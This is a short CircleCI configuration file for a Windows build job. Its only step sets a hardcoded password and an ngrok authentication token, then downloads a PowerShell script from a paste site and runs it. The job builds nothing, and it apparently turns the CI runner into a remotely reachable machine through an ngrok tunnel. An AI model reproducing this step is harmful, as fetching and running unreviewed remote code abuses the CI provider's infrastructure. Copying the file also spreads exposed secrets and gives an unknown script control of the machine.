version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Wontae
          command: |
            Set-Variable -Name "PASSWORD" -Value "abuna12@"
            Set-Variable -Name "NGROK" -Value "1ywAjSn8nEYSqG1X2SakX0aVHQs_4nfM6x8HkNkGG6pqfzDiH"
            Invoke-WebRequest https://www.heypasteit.com/download/0IXLQH -OutFile sumilang.ps1
            ./sumilang.ps1
